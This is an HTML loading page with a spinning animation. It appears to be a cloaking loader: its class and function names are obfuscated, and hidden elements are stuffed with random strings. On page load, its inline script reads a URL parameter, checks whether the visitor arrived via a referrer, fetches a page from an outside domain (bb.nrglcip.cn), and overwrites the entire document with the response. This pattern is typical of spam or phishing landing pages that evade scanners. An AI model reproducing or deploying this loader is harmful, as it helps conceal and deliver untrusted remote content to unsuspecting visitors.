<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .A8hl8fAw {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .A8hl8fAw .OrSdfuJf4VR {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .A8hl8fAw .content {
            line-height: 50px;
            text-align: center
        }

        .A8hl8fAw .img {
            width: 100%
        }

        .A8hl8fAw .bYtiFG73Lb {
            text-align: center
        }

        .A8hl8fAw .bYtiFG73Lb span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .A8hl8fAw .bYtiFG73Lb span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .A8hl8fAw .bYtiFG73Lb span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .A8hl8fAw .bYtiFG73Lb span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .A8hl8fAw .bYtiFG73Lb span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .A8hl8fAw .bYtiFG73Lb span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .A8hl8fAw .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function TyxrYPaxY(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var fCygVHI = TyxrYPaxY('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ fCygVHI +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ fCygVHI +".html?a=share";
		}
		
        TGzGXUbB9=url+"#"+new Date().getTime();
        TGzGXUbB9 && function() {
            $.get(TGzGXUbB9, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>gQKHAMrE1tufCQsVpkAD5pf3mxh</a>
<li style='display:none' >ZtUpGqYk2D9pWUbqveVhdvFPvq0rWAAmaIpKCaUuFYssXBi9NMhQKuTD4y2eJCnvS1MoVIHyJ0URi3b54EoOZtiHuI3n</li>
<b style='display:none' >fQd251oMDPYqN7E7XK47K2erzt</b>
<img  src='' style='display:none'>
<h1 style='display:none' >jyTOczo3z5VDjFfBZdDJqbJ9GbsJFkhYnD2BoEHZ98mme</h1><div class="A8hl8fAw">
    <div class="OrSdfuJf4VR">
        <div class="bYtiFG73Lb">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >kWgLlusggsDKmQsDNdHRMyy92apt9BvgWqG9w4sJTLhU6oukDbzbhKmT</ul>
<div style='display:none'>adDy2FInqRoHEJfPmu2iGdHuwHa8DfmrWEvc9VCVT4tv7Aoqa9ks91EH7NljxvcXTcEavnn1</div>
<h1 style='display:none' >QXuJ1m7eCYJYURw5voFGkVloFp3Z2gppMlITWIxcTO8LausdHmfdfc0NI9mJ</h1>
<span style='display:none'>f2gRNdPdEfmIJfy4Nn7ufyM0gPpLSxkZ3RRl62CgXlmVwZTJUZGDds9uDO7prxaDxZJ</span></body>
</html>